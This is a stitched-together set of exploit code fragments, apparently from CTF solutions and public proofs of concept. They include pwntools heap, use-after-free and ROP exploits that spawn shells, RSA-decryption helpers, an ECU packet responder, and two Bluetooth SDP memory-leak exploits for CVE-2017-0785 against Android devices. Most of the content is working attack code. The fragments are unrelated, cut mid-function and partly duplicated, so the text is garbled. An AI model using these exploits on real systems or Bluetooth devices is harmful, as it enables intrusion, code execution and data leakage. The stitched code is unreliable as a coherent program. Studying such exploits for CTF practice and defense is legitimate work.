def attack():
pr = pwn.process([remote_binary], cwd=os.path.dirname(remote_binary))
try:
elf = pwn.ELF(remote_binary, False)
payload = pwn.p32(elf.got["exit"] - 12)
pr.readline()
fullname = int(pr.readline())
# fullname
shellcode = pwn.asm(
"jmp skip;" + "nop;" * 100 +
"{} skip: nop;".format(pwn.shellcraft.i386.linux.sh())).ljust(672 -
4)
shellcode += pwn.p32(73).ljust(72)
shellcode += pwn.p32(0x101)
print(pwn.hexdump(shellcode))
print("shellcode length:", len(shellcode))
pr.writelineafter("Input fullname\n", shellcode)
# lastname
payload = pwn.p32(0x101) # set size to 0
payload += pwn.p32(elf.got["exit"] - 12) + pwn.p32(fullname + 8)
payload = payload.ljust(256 - 4)
payload = "A" * (256 - 4) + payload + pwn.p32(0x101) # set size to 0
print(pwn.hexdump(payload))
print("payload length:", len(payload))
pr.writelineafter("Input lastname\n", payload)
pr.interactive()
finally:
pr.close()
def test():
from Crypto.Util.number import bytes_to_long, long_to_bytes
import base64
ct = base64.b64decode('R0vRTQQAafW+rjLu4+vd5FOtFRJJDFfk9R1bsilaMXZ/qaVb/P0gIHOWL9pHZembt17LPq+iyzYroUOnRoz3Bd/1svTAs9ucljfcZ7i65zpwyLfn2J+24KHtFssXRVOO/V0R/8DydJsFmjyhzvkzGx4Flr5XMREt+T/4ZeeNYTA=')
p = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987245583
q = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987246769
e = 65537
key = generate_key_from_pqe(p, q, e)
ct = bytes_to_long(ct)
pt = rsa_decrypt(ct, key.d, key.N)
print hexdump(long_to_bytes(pt))
def callb(self, r):
while True:
client_input = r.recvrepeat(self.wait_for_response)
if len(client_input) < 1:
sleep(0.1)
continue
pwn.info("Recieved: " + pwn.hexdump(client_input))
pk = HSZFPacket()
pk.parse(client_input)
if pk.identifier == Identifier.REQUEST:
uds_data = pk.uds_packet.get_full_packet()
if len(uds_data) < 1:
data = 0x00
else:
data = unpack_all(uds_data)
# ECU identifier
if pk.reciever != 0x37 or pk.sender != 0x13:
response_data = self.sid_switch(0x33)(0x33, r, pk)
else:
response_data = self.sid_switch(data)(data, r, pk)
response = HSZFPacket()
response.create(response_data, pk.reciever, pk.sender)
pwn.info("Sending the response: " +
pwn.hexdump(response.get_full_packet()))
r.send(response.get_full_packet())
if data == 0x22F100:
pwn.info("--Got Session Request--\n" +
pwn.hexdump(pk.uds_packet.get_full_packet()))
response = HSZFPacket()
response.create(b'\x62\xF1\x00\x01\x81\x00\x01',
pk.reciever, pk.sender)
pwn.info("Sending the response: " +
pwn.hexdump(response.get_full_packet()))
r.send(response.get_full_packet())
r.clean_and_log()
def main():
target_bd_addr = args['BD_ADDR']
l2cap_mtu = 50
sock = BluetoothSocket(L2CAP)
set_l2cap_mtu(sock, l2cap_mtu)
sock.connect((target_bd_addr, PSM_SDP))
print('Sending the first SDP_SERVICE_SEARCH_REQ PDU')
params = {
'ServiceSearchPattern': b'\x35\x03\x19\x01\x00',
'MaximumServiceRecordCount': 0xFFFF,
'ContinuationState': b'\x00'
}
sock.send(sdp_service_search_req(params))
sdp_service_search_rsp = sock.recv(l2cap_mtu)
info_len = sdp_service_search_rsp[-3]
if info_len != ANDROID_CONT_STATE_INFO_LEN:
print(sdp_service_search_rsp[-3])
print('Invalid continuation state received.')
sys.exit(1)
stack = b''
for i in range(1, 30): # 越界读的次数太多会导致目标蓝牙崩溃
print('Sending packet %d' % i)
params = {
'ServiceSearchPattern': b'\x35\x03\x19\x01\x00',
'MaximumServiceRecordCount': 0x0001,
'ContinuationState': sdp_service_search_rsp[-3:]
}
sock.send(sdp_service_search_req(params))
sdp_service_search_rsp = sock.recv(l2cap_mtu)
# Leaked info is in ServiceRecordHandleList field
stack += sdp_service_search_rsp[9:-3]
sock.close()
print(hexdump(stack))
if len(stack) > 20:
print('CVE-2017-0785')
def decrypt(r1, r2, r3, e, N, ct):
d = d_from_primes_e([r1, r2, r3], e)
pt = rsa_decrypt(ct, d, N)
print "x:", pt
print hexdump(long_to_bytes(pt))
return pt
from rsautils import *
from generate_pem_from_pqe import generate_key_from_pqe
def test():
from Crypto.Util.number import bytes_to_long, long_to_bytes
import base64
ct = base64.b64decode('R0vRTQQAafW+rjLu4+vd5FOtFRJJDFfk9R1bsilaMXZ/qaVb/P0gIHOWL9pHZembt17LPq+iyzYroUOnRoz3Bd/1svTAs9ucljfcZ7i65zpwyLfn2J+24KHtFssXRVOO/V0R/8DydJsFmjyhzvkzGx4Flr5XMREt+T/4ZeeNYTA=')
p = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987245583
q = 9733382803370256893136109840971590971460094779242334919432347801491641617443615856221168611138933576118196795282443503609663168324106758595642231987246769
e = 65537
key = generate_key_from_pqe(p, q, e)
ct = bytes_to_long(ct)
pt = rsa_decrypt(ct, key.d, key.N)
print hexdump(long_to_bytes(pt))
if __name__ == "__main__":
import sys
if len(sys.argv) == 1:
print "Usage: %s <p> <q> <e> <ct>" % sys.argv[0]
print " %s -test" % sys.argv[0]
elif sys.argv[1] == "-test":
test()
else:
convert = lambda x: int(x, 16) if x[:2] == "0x" else int(x)
args = [convert(x) for x in sys.argv[1:]]
key = generate_key_from_pqe(*tuple(args))
pt = rsa_decrypt(ct, key['d'], key['N'])
print hexdump(pt)
+8 will contain give_shell.
We need to add our payload two times, since else only the woman instance is overwritten, and
calling man will crash.
"""
pwn.context.terminal = ["tmux", "splitw", "-h"]
exe = pwn.context.binary = pwn.ELF('./uaf')
random_file = "/tmp/%s" % pwn.util.fiddling.randoms(10)
size_of_new = 8
payload_length = size_of_new
address_of_virtual_address_table = 0x401570
payload = pwn.p64(address_of_virtual_address_table -
8) + b'a' * (size_of_new - 8)
pwn.debug(pwn.hexdump(payload))
gdbscript = '''
# Before "delete m;"
break *0x00401082
# before "m->introduce();"
break *0x00400fe2
# before "new"
break *0x00401020
continue
'''
if pwn.args.GDB:
pwn.write('/tmp/payload', payload)
arch = amd64
if __name__ == "__main__":
# pop the first gadget of the stack
chain = StartGadget(arch)
# create a rop chain of length 7 using all the gadgets in `gadgets`
chain = chain >> SMTGadget(arch, gadgets, levels=7)
# add some constraints for doing a function call
chain = chain >> amd64Call(
u64("RIP=FUNC"), # what to call?
u64("RDI=ARG1"), # first argument
u64("RSI=ARG2"), # secound argument
u64("RDX=ARG3") # ...
)
# check if this is possible, and generated a model of it
model = chain.model()
ins, outs, m = model
#how did we do it?
if "gadgets" in outs:
print "Gadgets used:"
for gadget in outs["gadgets"]:
addr = int(str(m.eval(gadget)))
gad = amd64_gadgets[addr]
print "0x%x: %s" % (addr, disasm(arch, addr, gad.code))
# print the final result
print "Ropchain:"
ropchain = chain.use(model=model)
print hexdump(ropchain)
val = rop_chain[x * 4:(x + 1) * 4]
val = pwn.u32(val)
write_stack_offset(x + addr, val)
mprotect_addr = exe.symbols['mprotect']
io = start()
io.recvuntil("=== Welcome to SECPROG calculator ===\n")
stack_addr = get_absolute_stack_address_below_main()
stack_addr_mod_pagesize = stack_addr - (stack_addr % 4096)
pwn.success("Stack absolute address is 0x%08x" % stack_addr)
pwn.success("Stack absolute address mod pagesize is 0x%08x" %
stack_addr_mod_pagesize)
rop_chain = (
pwn.p32(mprotect_addr) + # return from calc, go to mprotect
pwn.p32(stack_addr + 16)
+ # return address after mprotect, go to shellcode
pwn.p32(stack_addr_mod_pagesize) + # mprotect param: addr
pwn.p32(4096) + # mprotect param: page size
pwn.p32(7) + # mprotect param: rwx
pwn.asm(pwn.shellcraft.sh()
) # shellcode after stack has been marked executable
)
pwn.debug("ROP chain:\n%s" % pwn.hexdump(rop_chain))
write_rop_chain_to_addr(main_ret_address_offset, rop_chain)
io.sendline()
io.interactive()
# Try to initiate a connection to the target
try:
sock.connect((args.TARGET, 1))
except bt.btcommon.BluetoothError as e:
pwn.log.failure("Connection failed: %s" % e.message)
sys.exit(1)
# Send the first package for the long service without continuation state
p.status('Sending packet 0')
sock.send(construct_packet(SDP_SERVICE_LONG, '\x00'))
data = sock.recv(MTU)
if data[-3] != '\x02':
pwn.log.failure('Invalid continuation state received.')
sys.exit(1)
leaked = str()
# Send packages to the short service with the received continuation state of
# the long service. This results in a state confusion and a buffer underflow.
# The underflow causes the remote device to send data from the stack we
# should not be able to see
for i in range(1, args.count):
p.status('Sending packet %d' % i)
sock.send(construct_packet(SDP_SERVICE_SHORT, data[-3:]))
data = sock.recv(MTU)
leaked += data[9:-3]
sock.close()
p.success('Done')
print pwn.hexdump(leaked, skip=not args.no_skip_repeat)
